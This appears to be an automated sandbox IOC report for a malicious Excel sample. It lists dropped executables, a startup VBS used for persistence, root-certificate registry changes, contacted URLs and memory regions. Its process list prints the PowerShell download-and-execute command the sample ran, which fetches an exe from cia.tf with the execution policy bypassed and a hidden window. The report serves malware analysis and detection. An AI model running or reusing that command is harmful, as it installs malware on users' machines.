IOC Report
7qsPAygCOx.xlsx

loading gif

Files

File Path
Type
Category
Malicious
7qsPAygCOx.xlsx
Microsoft Excel 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Temp\tmp7752.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\svcost.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\Desktop\~$7qsPAygCOx.xlsx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CD0796D.png
PNG image data, 1209 x 635, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\gwjpox30.b33.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\lvmpns14.xqn.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF3CAD9F37754A2A51.TMP
data
dropped
C:\Users\user\Desktop\7qsPAygCOx.xls (copy)
Microsoft Excel 2007+
dropped
C:\Users\user\Desktop\BA230000
Microsoft Excel 2007+
dropped
C:\Users\user\Desktop\BA230000:Zone.Identifier
ASCII text, with CRLF line terminators
modified
C:\Users\user\Desktop\~$7qsPAygCOx.xls
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
malicious
C:\Users\user\AppData\Local\Temp\tmp7752.exe
"C:\Users\user\AppData\Local\Temp\tmp7752.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
malicious
C:\Users\user\AppData\Roaming\svcost.exe
"C:\Users\user\AppData\Roaming\svcost.exe"
malicious

URLs

Name
IP
Malicious
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe
104.21.1.182
malicious
https://cia.tf
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exed
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
http://ocsps.ssl.com0?
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;z
unknown
https://contoso.com/License
unknown
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
unknown
https://contoso.com/Icon
unknown
https://github.com/mgravell/protobuf-net
unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://ocsps.ssl.com0
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.
unknown
http://go.micros
unknown
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
unknown
https://github.com/mgravell/protobuf-neti
unknown
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
unknown
http://cia.tf
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
http://checkip.dyndns.org/q
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.ssl.com/repository0
unknown
http://ocsps.ssl.com0_
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cia.tf
104.21.1.182

IPs

IP
Domain
Country
Malicious
104.21.1.182
cia.tf
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
')0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2CD7C
2CD7C
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{/0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32B93
32B93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 44 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
361A000
trusted library allocation
page read and write
malicious
24F6000
trusted library allocation
page read and write
malicious
2882000
trusted library allocation
page read and write
malicious
297A000
trusted library allocation
page read and write
malicious
26ED000
trusted library allocation
page read and write
malicious
4A80000
trusted library section
page read and write
malicious
3821000
trusted library allocation
page read and write
malicious
1CA000
trusted library allocation
page execute and read and write
2778000
trusted library allocation
page read and write
2B40000
trusted library allocation
page read and write
2BC5000
trusted library allocation
page read and write
2974000
trusted library allocation
page read and write
2F0000
heap
page read and write
1D0000
heap
page read and write
2BAB000
trusted library allocation
page read and write
2B91000
trusted library allocation
page read and write
123D1000
trusted library allocation
page read and write
2B56000
trusted library allocation
page read and write
2CAD000
trusted library allocation
page read and write
7FE8BA80000
trusted library allocation
page read and write
29B0000
trusted library allocation
page read and write
2B24000
trusted library allocation
page read and write
288A000
trusted library allocation
page read and write
24B000
stack
page read and write
1C4A3000
heap
page read and write
28BE000
trusted library allocation
page read and write
7FE8BA40000
trusted library allocation
page read and write
1C214000
heap
page read and write
7FE8BA90000
trusted library allocation
page read and write
282D000
trusted library allocation
page read and write
2C1C000
trusted library allocation
page read and write
2D51000
trusted library allocation
page read and write
2FF000
heap
page read and write
5FA000
trusted library allocation
page read and write
1AB6D000
heap
page read and write
29CF000
trusted library allocation
page read and write
1B48F000
stack
page read and write
2D40000
trusted library allocation
page read and write
2998000
trusted library allocation
page read and write
7FE8BAA0000
trusted library allocation
page read and write
5440000
trusted library allocation
page read and write
440000
trusted library allocation
page read and write
1E60000
heap
page read and write
29D9000
trusted library allocation
page read and write
2855000
trusted library allocation
page read and write
2A2D000
trusted library allocation
page read and write
2978000
trusted library allocation
page read and write
27E5000
trusted library allocation
page read and write
29A6000
trusted library allocation
page read and write
2B93000
trusted library allocation
page read and write
2A6B000
trusted library allocation
page read and write
5400000
trusted library allocation
page execute and read and write
7FE8B753000
trusted library allocation
page read and write
106000
heap
page read and write
2A5E000
trusted library allocation
page read and write
1312000
unkown
page execute read
2C77000
trusted library allocation
page read and write
5F6000
trusted library allocation
page read and write
513F000
stack
page read and write
3FA2000
trusted library allocation
page read and write
1C1CD000
heap
page read and write
A70000
unkown
page readonly
386000
heap
page read and write
297A000
trusted library allocation
page read and write
2628000
trusted library allocation
page read and write
7FE8BA00000
trusted library allocation
page read and write
C70000
heap
page execute and read and write
2A54000
trusted library allocation
page read and write
37E2000
trusted library allocation
page read and write
2C26000
trusted library allocation
page read and write
2DB9000
trusted library allocation
page read and write
29C1000
trusted library allocation
page read and write
2A16000
trusted library allocation
page read and write
2B95000
trusted library allocation
page read and write
2C4B000
trusted library allocation
page read and write
2DA6000
trusted library allocation
page read and write
48B000
heap
page read and write
2C64000
trusted library allocation
page read and write
447000
stack
page read and write
48B000
heap
page read and write
622000
trusted library allocation
page read and write
2B02000
trusted library allocation
page read and write
2669000
trusted library allocation
page read and write
49E000
heap
page read and write
2D2A000
trusted library allocation
page read and write
2A3A000
trusted library allocation
page read and write
27E9000
trusted library allocation
page read and write
28B8000
trusted library allocation
page read and write
710000
heap
page execute and read and write
D0D000
stack
page read and write
2B71000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
7FE8BA60000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
2BBA000
trusted library allocation
page read and write
13D000
trusted library allocation
page execute and read and write
2B50000
trusted library allocation
page read and write
1A5AD000
stack
page read and write
29C5000
trusted library allocation
page read and write
6A0000
trusted library allocation
page read and write
299A000
trusted library allocation
page read and write
7FE8B8E0000
trusted library allocation
page read and write
200000
trusted library allocation
page execute and read and write
2827000
trusted library allocation
page read and write
2D3C000
trusted library allocation
page read and write
7FE8B860000
trusted library allocation
page execute and read and write
2770000
trusted library allocation
page read and write
2878000
trusted library allocation
page read and write
514000
heap
page read and write
3B9F000
stack
page read and write
760000
heap
page read and write
366C000
trusted library allocation
page read and write
278D000
trusted library allocation
page read and write
1C6C0000
heap
page read and write
7FE8B960000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
264F000
trusted library allocation
page read and write
9C0000
trusted library allocation
page read and write
55A000
heap
page read and write
1E64000
heap
page read and write
2B37000
trusted library allocation
page read and write
2ABB000
trusted library allocation
page read and write
2A69000
trusted library allocation
page read and write
2636000
trusted library allocation
page read and write
2A2D000
trusted library allocation
page read and write
2755000
trusted library allocation
page read and write
43E000
heap
page read and write
278B000
trusted library allocation
page read and write
2A2F000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
2B1E000
trusted library allocation
page read and write
2978000
trusted library allocation
page read and write
2A1A000
trusted library allocation
page read and write
2A31000
trusted library allocation
page read and write
2915000
trusted library allocation
page read and write
29E000
heap
page read and write
150000
heap
page read and write
2A7E000
trusted library allocation
page read and write
2934000
trusted library allocation
page read and write
2818000
trusted library allocation
page read and write
2AD8000
trusted library allocation
page read and write
28EF000
trusted library allocation
page read and write
2A2B000
trusted library allocation
page read and write
2D25000
trusted library allocation
page read and write
2CCC000
trusted library allocation
page read and write
25E3000
trusted library allocation
page read and write
7FE8B940000
trusted library allocation
page read and write
2BFA000
trusted library allocation
page read and write
277A000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
2944000
trusted library allocation
page read and write
2DF5000
trusted library allocation
page read and write
22AD000
stack
page read and write
2A92000
trusted library allocation
page read and write
D0000
heap
page read and write
2AA000
heap
page read and write
2A71000
trusted library allocation
page read and write
133000
trusted library allocation
page execute and read and write
2BFD000
trusted library allocation
page read and write
27CE000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
29BF000
trusted library allocation
page read and write
2A12000
trusted library allocation
page read and write
2CCA000
trusted library allocation
page read and write
2DB3000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
258000
trusted library allocation
page read and write
2D76000
trusted library allocation
page read and write
1AB15000
heap
page read and write
2CA5000
trusted library allocation
page read and write
2BA3000
trusted library allocation
page read and write
2D8F000
trusted library allocation
page read and write
5BA000
heap
page read and write
AA0000
trusted library allocation
page execute and read and write
1C1DE000
heap
page read and write
2CD4000
trusted library allocation
page read and write
29B3000
trusted library allocation
page read and write
264B000
trusted library allocation
page read and write
130000
heap
page read and write
461000
heap
page read and write
2740000
trusted library allocation
page read and write
287A000
trusted library allocation
page read and write
70F000
trusted library allocation
page read and write
543000
heap
page read and write
28A7000
trusted library allocation
page read and write
28FC000
trusted library allocation
page read and write
1C6000
trusted library allocation
page execute and read and write
291D000
trusted library allocation
page read and write
DAE000
stack
page read and write
2DD8000
trusted library allocation
page read and write
2774000
trusted library allocation
page read and write
2985000
trusted library allocation
page read and write
25EC000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
2BC3000
trusted library allocation
page read and write
1AA91000
heap
page read and write
32B000
heap
page read and write
3F5F000
trusted library allocation
page read and write
298D000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
2846000
trusted library allocation
page read and write
3F4F000
trusted library allocation
page read and write
22AD000
heap
page read and write
290000
heap
page read and write
2989000
trusted library allocation
page read and write
281F000
trusted library allocation
page read and write
1F4000
heap
page read and write
670000
trusted library allocation
page read and write
110000
trusted library allocation
page read and write
C3F000
stack
page read and write
2760000
trusted library allocation
page read and write
2A3C000
trusted library allocation
page read and write
2814000
trusted library allocation
page read and write
29BA000
trusted library allocation
page read and write
222E000
stack
page read and write | page guard
2C5E000
trusted library allocation
page read and write
1A84D000
stack
page read and write
5451000
trusted library allocation
page read and write
340000
trusted library allocation
page read and write
2DC1000
trusted library allocation
page read and write
2A23000
trusted library allocation
page read and write
2A2F000
trusted library allocation
page read and write
1E3F000
stack
page read and write
483000
heap
page read and write
2789000
trusted library allocation
page read and write
2D57000
trusted library allocation
page read and write
2C41000
trusted library allocation
page read and write
2BFF000
trusted library allocation
page read and write
3FA8000
trusted library allocation
page read and write
7FE8B742000
trusted library allocation
page read and write
231F000
stack
page read and write
2CE000
heap
page read and write
293C000
trusted library allocation
page read and write
2A0C000
trusted library allocation
page read and write
28C0000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
29EB000
trusted library allocation
page read and write
DEE000
stack
page read and write
2B74000
trusted library allocation
page read and write
2AB7000
trusted library allocation
page read and write
A0E000
stack
page read and write
29AA000
trusted library allocation
page read and write
2894000
trusted library allocation
page read and write
2DF9000
trusted library allocation
page read and write
2664000
trusted library allocation
page read and write
3A00000
trusted library allocation
page read and write
2E0000
trusted library allocation
page read and write
2772000
trusted library allocation
page read and write
2DDC000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
7FE8B970000
trusted library allocation
page read and write
2A20000
trusted library allocation
page read and write
2D91000
trusted library allocation
page read and write
27B1000
trusted library allocation
page read and write
7FE8B826000
trusted library allocation
page execute and read and write
2A38000
trusted library allocation
page read and write
357B000
trusted library allocation
page read and write
1A5FB000
heap
page read and write
2D85000
trusted library allocation
page read and write
2829000
trusted library allocation
page read and write
3F9E000
trusted library allocation
page read and write
1253F000
trusted library allocation
page read and write
7FE8B744000
trusted library allocation
page read and write
2A29000
trusted library allocation
page read and write
29EF000
trusted library allocation
page read and write
29FB000
trusted library allocation
page read and write
1D4000
heap
page read and write
2DFB000
trusted library allocation
page read and write
2A01000
trusted library allocation
page read and write
2CB9000
trusted library allocation
page read and write
27C4000
trusted library allocation
page read and write
1C23D000
heap
page read and write
330000
heap
page read and write
680000
trusted library allocation
page read and write
29AC000
trusted library allocation
page read and write
2C22000
trusted library allocation
page read and write
1A6B8000
stack
page read and write
298F000
trusted library allocation
page read and write
610000
trusted library allocation
page execute and read and write
53AE000
stack
page read and write
7FE8B8F3000
trusted library allocation
page read and write
2A6B000
trusted library allocation
page read and write
2DB000
stack
page read and write
2280000
heap
page read and write
2B3D000
trusted library allocation
page read and write
2A4E000
trusted library allocation
page read and write
1C271000
heap
page read and write
29C0000
trusted library allocation
page read and write
2D53000
trusted library allocation
page read and write
2C2A000
trusted library allocation
page read and write
7FE8B922000
trusted library allocation
page read and write
1BE6000
heap
page read and write
25F5000
trusted library allocation
page read and write
2B8E000
trusted library allocation
page read and write
2A6D000
trusted library allocation
page read and write
7FE8B9D0000
trusted library allocation
page read and write
1C44E000
stack
page read and write
2B5D000
trusted library allocation
page read and write
2AF8000
trusted library allocation
page read and write
482000
heap
page read and write
2A4C000
trusted library allocation
page read and write
2892000
trusted library allocation
page read and write
59D000
heap
page read and write
2B86000
trusted library allocation
page read and write
1C246000
heap
page read and write
2DE5000
trusted library allocation
page read and write
54F000
heap
page read and write
2995000
trusted library allocation
page read and write
1C2000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
7FE8BA50000
trusted library allocation
page read and write
2CC4000
trusted library allocation
page read and write
2BDD000
trusted library allocation
page read and write
239E000
stack
page read and write
2DBB000
trusted library allocation
page read and write
2957000
trusted library allocation
page read and write
29E2000
trusted library allocation
page read and write
228C000
heap
page read and write
3F90000
trusted library allocation
page read and write
2C4E000
trusted library allocation
page read and write
2A8C000
trusted library allocation
page read and write
274D000
trusted library allocation
page read and write
650000
trusted library allocation
page read and write
2B84000
trusted library allocation
page read and write
282B000
trusted library allocation
page read and write
7FE8B8F7000
trusted library allocation
page read and write
2D93000
trusted library allocation
page read and write
2DA8000
trusted library allocation
page read and write
507000
heap
page read and write
29D5000
trusted library allocation
page read and write
124000
trusted library allocation
page read and write
2821000
trusted library allocation
page read and write
1AF66000
heap
page read and write
2A58000
trusted library allocation
page read and write
2C45000
trusted library allocation
page read and write
2CB5000
trusted library allocation
page read and write
2A65000
trusted library allocation
page read and write
2AB5000
trusted library allocation
page read and write
2DE2000
trusted library allocation
page read and write
2D1D000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
23C1000
trusted library allocation
page read and write
280A000
trusted library allocation
page read and write
2D72000
trusted library allocation
page read and write
29CB000
trusted library allocation
page read and write
2420000
trusted library allocation
page read and write
597000
heap
page read and write
2A4C000
trusted library allocation
page read and write
4AC000
trusted library allocation
page read and write
1C1AB000
heap
page read and write
110000
heap
page read and write
35CB000
trusted library allocation
page read and write
1A78E000
heap
page execute and read and write
297C000
trusted library allocation
page read and write
2667000
trusted library allocation
page read and write
17E3E000
stack
page read and write
2BB6000
trusted library allocation
page read and write
29B8000
trusted library allocation
page read and write
2617000
trusted library allocation
page read and write
459000
heap
page read and write
2DDE000
trusted library allocation
page read and write
460000
trusted library allocation
page execute and read and write
629000
trusted library allocation
page read and write
23A0000
trusted library allocation
page execute and read and write
27B9000
trusted library allocation
page read and write
461000
heap
page read and write
2A10000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
1DA000
trusted library allocation
page execute and read and write
2B5B000
trusted library allocation
page read and write
29C8000
trusted library allocation
page read and write
27CA000
trusted library allocation
page read and write
2C62000
trusted library allocation
page read and write
120000
trusted library allocation
page read and write
27BC000
trusted library allocation
page read and write
2D27000
trusted library allocation
page read and write
2A03000
trusted library allocation
page read and write
365000
heap
page read and write
321F000
trusted library allocation
page read and write
235E000
stack
page read and write | page guard
2C66000
trusted library allocation
page read and write
286D000
trusted library allocation
page read and write
450000
trusted library allocation
page read and write
2A63000
trusted library allocation
page read and write
2632000
trusted library allocation
page read and write
2BBE000
trusted library allocation
page read and write
2A5C000
trusted library allocation
page read and write
2A52000
trusted library allocation
page read and write
4C7E000
stack
page read and write
2B8C000
trusted library allocation
page read and write
2A8E000
trusted library allocation
page read and write
7FE8B7F6000
trusted library allocation
page read and write
28D6000
trusted library allocation
page read and write
FAE000
stack
page read and write
2840000
trusted library allocation
page read and write
2CE9000
trusted library allocation
page read and write
2C82000
trusted library allocation
page read and write
7FE8B9E0000
trusted library allocation
page read and write
3C6000
heap
page read and write
2CD7000
trusted library allocation
page read and write
2753000
trusted library allocation
page read and write
2A05000
trusted library allocation
page read and write
2AD4000
trusted library allocation
page read and write
2639000
trusted library allocation
page read and write
7FE8B9A0000
trusted library allocation
page read and write
29A5000
trusted library allocation
page read and write
720000
heap
page execute and read and write
28F2000
trusted library allocation
page read and write
A90000
trusted library allocation
page execute and read and write
123000
trusted library allocation
page execute and read and write
2A50000
trusted library allocation
page read and write
7FE8B980000
trusted library allocation
page read and write
291F000
trusted library allocation
page read and write
5020000
trusted library allocation
page execute and read and write
2450000
heap
page execute and read and write
1C216000
heap
page read and write
25FD000
trusted library allocation
page read and write
2C8E000
trusted library allocation
page read and write
1C180000
heap
page read and write
37A0000
trusted library allocation
page read and write
29EB000
trusted library allocation
page read and write
2649000
trusted library allocation
page read and write
7FE8B7FC000
trusted library allocation
page execute and read and write
29FF000
trusted library allocation
page read and write
10000
heap
page read and write
2A90000
trusted library allocation
page read and write
2D15000
trusted library allocation
page read and write
54D000
heap
page read and write
2CE5000
trusted library allocation
page read and write
2624000
trusted library allocation
page read and write
2D1B000
trusted library allocation
page read and write
2C24000
trusted library allocation
page read and write
2825000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
280E000
trusted library allocation
page read and write
2792000
trusted library allocation
page read and write
29F9000
trusted library allocation
page read and write
1AF30000
heap
page read and write
2AE7000
trusted library allocation
page read and write
2B20000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
1AA69000
stack
page read and write
2BA5000
trusted library allocation
page read and write
2C90000
trusted library allocation
page read and write
29BE000
trusted library allocation
page read and write
2A1A000
trusted library allocation
page read and write
25BE000
stack
page read and write
2B88000
trusted library allocation
page read and write
1E7000
trusted library allocation
page execute and read and write
3748000
trusted library allocation
page read and write
1BB0000
heap
page read and write
2A62000
trusted library allocation
page read and write
1BD000
trusted library allocation
page execute and read and write
39B000
heap
page read and write
2AEF000
trusted library allocation
page read and write
2C13000
trusted library allocation
page read and write
8F0000
trusted library allocation
page read and write
2972000
trusted library allocation
page read and write
A70000
unkown
page readonly
2751000
trusted library allocation
page read and write
F3000
stack
page read and write
293E000
trusted library allocation
page read and write
301000
heap
page read and write
2959000
trusted library allocation
page read and write
2A67000
trusted library allocation
page read and write
2947000
trusted library allocation
page read and write
2A18000
trusted library allocation
page read and write
7FE8B7F0000
trusted library allocation
page read and write
2BA1000
trusted library allocation
page read and write
360000
heap
page read and write
2A56000
trusted library allocation
page read and write
27EB000
trusted library allocation
page read and write
25E1000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
235F000
stack
page read and write
27A5000
trusted library allocation
page read and write
7FE8B9B0000
trusted library allocation
page read and write
460000
heap
page execute and read and write
1A91C000
stack
page read and write
2110000
trusted library allocation
page execute and read and write
2D7B000
trusted library allocation
page read and write
2C71000
trusted library allocation
page read and write
1C25F000
heap
page read and write
2B1C000
trusted library allocation
page read and write
29DE000
trusted library allocation
page read and write
2603000
trusted library allocation
page read and write
2821000
trusted library allocation
page read and write
262E000
trusted library allocation
page read and write
2925000
trusted library allocation
page read and write
2838000
trusted library allocation
page read and write
45C000
heap
page read and write
2A4A000
trusted library allocation
page read and write
262A000
trusted library allocation
page read and write
44B0000
trusted library allocation
page execute and read and write
500000
heap
page read and write
37A0000
trusted library allocation
page read and write
5150000
heap
page read and write
640000
trusted library allocation
page execute and read and write
29BD000
trusted library allocation
page read and write
25FF000
trusted library allocation
page read and write
282F000
trusted library allocation
page read and write
27D4000
trusted library allocation
page read and write
4A1F000
stack
page read and write
2A05000
trusted library allocation
page read and write
4F7000
heap
page read and write
2A6F000
trusted library allocation
page read and write
261A000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
12D000
trusted library allocation
page execute and read and write
2A0E000
trusted library allocation
page read and write
2ADA000
trusted library allocation
page read and write
7FE8BA10000
trusted library allocation
page read and write
2D7F000
trusted library allocation
page read and write
66E000
stack
page read and write
6F0000
trusted library allocation
page read and write
BCF000
stack
page read and write
281B000
trusted library allocation
page read and write
295D000
trusted library allocation
page read and write
1AAF5000
heap
page read and write
1AAD2000
heap
page read and write
524000
heap
page read and write
2BF4000
trusted library allocation
page read and write
2A03000
trusted library allocation
page read and write
288C000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
2DF7000
trusted library allocation
page read and write
2AFC000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
1C0FD000
stack
page read and write
2C28000
trusted library allocation
page read and write
4BFE000
stack
page read and write
299D000
trusted library allocation
page read and write
7FE8B75B000
trusted library allocation
page read and write
4820000
trusted library section
page read and write
2662000
trusted library allocation
page read and write
3491000
trusted library allocation
page read and write
2B2D000
trusted library allocation
page read and write
28AD000
trusted library allocation
page read and write
27ED000
trusted library allocation
page read and write
28A1000
